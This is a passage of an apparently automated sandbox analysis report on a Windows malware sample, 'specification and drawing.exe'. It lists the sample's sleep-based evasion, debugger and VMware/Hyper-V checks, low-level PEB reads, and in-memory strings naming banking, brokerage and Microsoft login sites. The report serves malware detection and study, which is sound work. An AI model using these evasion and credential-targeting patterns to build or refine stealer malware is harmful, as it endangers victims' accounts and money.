                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 2032Thread sleep count: 1820 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 2032Thread sleep time: -3640000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 2032Thread sleep count: 8153 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 2032Thread sleep time: -16306000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe TID: 2820Thread sleep time: -65000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe TID: 2820Thread sleep count: 32 > 30Jump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe TID: 2820Thread sleep time: -48000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe TID: 2820Thread sleep count: 32 > 30Jump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe TID: 2820Thread sleep time: -32000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0076C7A0 FindFirstFileW,FindNextFileW,FindClose,8_2_0076C7A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696487552
                      Source: 2361o4QI.8.drBinary or memory string: discord.comVMware20,11696487552f
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1169648
                      Source: 2361o4QI.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: specification and drawing.exe, 00000000.00000002.2165460201.0000000001153000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: 2361o4QI.8.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: 2361o4QI.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: 2361o4QI.8.drBinary or memory string: global block list test formVMware20,11696487552
                      Source: 2361o4QI.8.drBinary or memory string: tasks.office.comVMware20,11696487552o
                      Source: 2361o4QI.8.drBinary or memory string: AMC password management pageVMware20,11696487552
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sswords blocklistVMware2A
                      Source: firefox.exe, 0000000C.00000002.2711081924.000002223ED5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
                      Source: 2361o4QI.8.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: 2361o4QI.8.drBinary or memory string: dev.azure.comVMware20,11696487552j
                      Source: 2361o4QI.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.comVMware20,11696487552
                      Source: 2361o4QI.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: 2361o4QI.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4588851787.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                      Source: 2361o4QI.8.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,1
                      Source: 2361o4QI.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: 2361o4QI.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: 2361o4QI.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: 2361o4QI.8.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: 2361o4QI.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,116:
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,11696487552
                      Source: wscript.exe, 00000008.00000002.4585557607.00000000008F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 2361o4QI.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e365.comVMware20,1169648
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,1169648
                      Source: 2361o4QI.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: specification and drawing.exe, 00000000.00000002.2165460201.0000000001153000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.aVMware20,1169648
                      Source: 2361o4QI.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: 2361o4QI.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - HKVMware20,11696487552]
                      Source: 2361o4QI.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: 2361o4QI.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: 2361o4QI.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: 2361o4QI.8.drBinary or memory string: outlook.office.comVMware20,11696487552s
                      Source: 2361o4QI.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: 2361o4QI.8.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                      Source: 2361o4QI.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: wscript.exe, 00000008.00000002.4593381397.0000000007D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696487552
                      Source: 2361o4QI.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: 2361o4QI.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0110096E rdtsc 4_2_0110096E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_00417BA3 LdrLoadDll,4_2_00417BA3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01180115 mov eax, dword ptr fs:[00000030h]4_2_01180115
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116A118 mov ecx, dword ptr fs:[00000030h]4_2_0116A118
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116A118 mov eax, dword ptr fs:[00000030h]4_2_0116A118
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116A118 mov eax, dword ptr fs:[00000030h]4_2_0116A118
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116A118 mov eax, dword ptr fs:[00000030h]4_2_0116A118
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F0124 mov eax, dword ptr fs:[00000030h]4_2_010F0124
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01158158 mov eax, dword ptr fs:[00000030h]4_2_01158158
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01154144 mov eax, dword ptr fs:[00000030h]4_2_01154144
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01154144 mov eax, dword ptr fs:[00000030h]4_2_01154144
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01154144 mov ecx, dword ptr fs:[00000030h]4_2_01154144
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01154144 mov eax, dword ptr fs:[00000030h]4_2_01154144
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01154144 mov eax, dword ptr fs:[00000030h]4_2_01154144
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6154 mov eax, dword ptr fs:[00000030h]4_2_010C6154
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6154 mov eax, dword ptr fs:[00000030h]4_2_010C6154
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BC156 mov eax, dword ptr fs:[00000030h]4_2_010BC156
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114019F mov eax, dword ptr fs:[00000030h]4_2_0114019F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114019F mov eax, dword ptr fs:[00000030h]4_2_0114019F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114019F mov eax, dword ptr fs:[00000030h]4_2_0114019F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114019F mov eax, dword ptr fs:[00000030h]4_2_0114019F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01100185 mov eax, dword ptr fs:[00000030h]4_2_01100185
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01164180 mov eax, dword ptr fs:[00000030h]4_2_01164180
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01164180 mov eax, dword ptr fs:[00000030h]4_2_01164180
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BA197 mov eax, dword ptr fs:[00000030h]4_2_010BA197
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BA197 mov eax, dword ptr fs:[00000030h]4_2_010BA197
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BA197 mov eax, dword ptr fs:[00000030h]4_2_010BA197
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0117C188 mov eax, dword ptr fs:[00000030h]4_2_0117C188
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0117C188 mov eax, dword ptr fs:[00000030h]4_2_0117C188
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E1D0 mov eax, dword ptr fs:[00000030h]4_2_0113E1D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E1D0 mov eax, dword ptr fs:[00000030h]4_2_0113E1D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0113E1D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E1D0 mov eax, dword ptr fs:[00000030h]4_2_0113E1D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E1D0 mov eax, dword ptr fs:[00000030h]4_2_0113E1D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011861C3 mov eax, dword ptr fs:[00000030h]4_2_011861C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011861C3 mov eax, dword ptr fs:[00000030h]4_2_011861C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F01F8 mov eax, dword ptr fs:[00000030h]4_2_010F01F8
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011961E5 mov eax, dword ptr fs:[00000030h]4_2_011961E5
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01144000 mov ecx, dword ptr fs:[00000030h]4_2_01144000
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01162000 mov eax, dword ptr fs:[00000030h]4_2_01162000
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01162000 mov eax, dword ptr fs:[00000030h]4_2_01162000
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01162000 mov eax, dword ptr fs:[00000030h]4_2_01162000
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01162000 mov eax, dword ptr fs:[00000030h]4_2_01162000
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01162000 mov eax, dword ptr fs:[00000030h]4_2_01162000
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01162000 mov eax, dword ptr fs:[00000030h]4_2_01162000
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01162000 mov eax, dword ptr fs:[00000030h]4_2_01162000
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01162000 mov eax, dword ptr fs:[00000030h]4_2_01162000
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE016 mov eax, dword ptr fs:[00000030h]4_2_010DE016
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE016 mov eax, dword ptr fs:[00000030h]4_2_010DE016
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE016 mov eax, dword ptr fs:[00000030h]4_2_010DE016
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE016 mov eax, dword ptr fs:[00000030h]4_2_010DE016
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01156030 mov eax, dword ptr fs:[00000030h]4_2_01156030
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BA020 mov eax, dword ptr fs:[00000030h]4_2_010BA020
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BC020 mov eax, dword ptr fs:[00000030h]4_2_010BC020
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146050 mov eax, dword ptr fs:[00000030h]4_2_01146050
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C2050 mov eax, dword ptr fs:[00000030h]4_2_010C2050
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EC073 mov eax, dword ptr fs:[00000030h]4_2_010EC073
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C208A mov eax, dword ptr fs:[00000030h]4_2_010C208A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011860B8 mov eax, dword ptr fs:[00000030h]4_2_011860B8
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011860B8 mov ecx, dword ptr fs:[00000030h]4_2_011860B8
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011580A8 mov eax, dword ptr fs:[00000030h]4_2_011580A8
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011420DE mov eax, dword ptr fs:[00000030h]4_2_011420DE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011020F0 mov ecx, dword ptr fs:[00000030h]4_2_011020F0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C80E9 mov eax, dword ptr fs:[00000030h]4_2_010C80E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BA0E3 mov ecx, dword ptr fs:[00000030h]4_2_010BA0E3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011460E0 mov eax, dword ptr fs:[00000030h]4_2_011460E0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BC0F0 mov eax, dword ptr fs:[00000030h]4_2_010BC0F0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA30B mov eax, dword ptr fs:[00000030h]4_2_010FA30B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA30B mov eax, dword ptr fs:[00000030h]4_2_010FA30B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA30B mov eax, dword ptr fs:[00000030h]4_2_010FA30B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BC310 mov ecx, dword ptr fs:[00000030h]4_2_010BC310
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E0310 mov ecx, dword ptr fs:[00000030h]4_2_010E0310
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114035C mov eax, dword ptr fs:[00000030h]4_2_0114035C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114035C mov eax, dword ptr fs:[00000030h]4_2_0114035C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114035C mov eax, dword ptr fs:[00000030h]4_2_0114035C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114035C mov ecx, dword ptr fs:[00000030h]4_2_0114035C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114035C mov eax, dword ptr fs:[00000030h]4_2_0114035C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114035C mov eax, dword ptr fs:[00000030h]4_2_0114035C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118A352 mov eax, dword ptr fs:[00000030h]4_2_0118A352
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01142349 mov eax, dword ptr fs:[00000030h]4_2_01142349
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116437C mov eax, dword ptr fs:[00000030h]4_2_0116437C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E438F mov eax, dword ptr fs:[00000030h]4_2_010E438F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E438F mov eax, dword ptr fs:[00000030h]4_2_010E438F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE388 mov eax, dword ptr fs:[00000030h]4_2_010BE388
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE388 mov eax, dword ptr fs:[00000030h]4_2_010BE388
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE388 mov eax, dword ptr fs:[00000030h]4_2_010BE388
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B8397 mov eax, dword ptr fs:[00000030h]4_2_010B8397
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B8397 mov eax, dword ptr fs:[00000030h]4_2_010B8397
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B8397 mov eax, dword ptr fs:[00000030h]4_2_010B8397
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011643D4 mov eax, dword ptr fs:[00000030h]4_2_011643D4
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011643D4 mov eax, dword ptr fs:[00000030h]4_2_011643D4
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA3C0 mov eax, dword ptr fs:[00000030h]4_2_010CA3C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C83C0 mov eax, dword ptr fs:[00000030h]4_2_010C83C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C83C0 mov eax, dword ptr fs:[00000030h]4_2_010C83C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C83C0 mov eax, dword ptr fs:[00000030h]4_2_010C83C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C83C0 mov eax, dword ptr fs:[00000030h]4_2_010C83C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011463C0 mov eax, dword ptr fs:[00000030h]4_2_011463C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0117C3CD mov eax, dword ptr fs:[00000030h]4_2_0117C3CD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D03E9 mov eax, dword ptr fs:[00000030h]4_2_010D03E9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F63FF mov eax, dword ptr fs:[00000030h]4_2_010F63FF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE3F0 mov eax, dword ptr fs:[00000030h]4_2_010DE3F0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE3F0 mov eax, dword ptr fs:[00000030h]4_2_010DE3F0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE3F0 mov eax, dword ptr fs:[00000030h]4_2_010DE3F0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B823B mov eax, dword ptr fs:[00000030h]4_2_010B823B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6259 mov eax, dword ptr fs:[00000030h]4_2_010C6259
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01148243 mov eax, dword ptr fs:[00000030h]4_2_01148243
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01148243 mov ecx, dword ptr fs:[00000030h]4_2_01148243
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BA250 mov eax, dword ptr fs:[00000030h]4_2_010BA250
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B826B mov eax, dword ptr fs:[00000030h]4_2_010B826B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01170274 mov eax, dword ptr fs:[00000030h]4_2_01170274
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4260 mov eax, dword ptr fs:[00000030h]4_2_010C4260
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4260 mov eax, dword ptr fs:[00000030h]4_2_010C4260
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4260 mov eax, dword ptr fs:[00000030h]4_2_010C4260
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE284 mov eax, dword ptr fs:[00000030h]4_2_010FE284
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE284 mov eax, dword ptr fs:[00000030h]4_2_010FE284
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01140283 mov eax, dword ptr fs:[00000030h]4_2_01140283
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01140283 mov eax, dword ptr fs:[00000030h]4_2_01140283
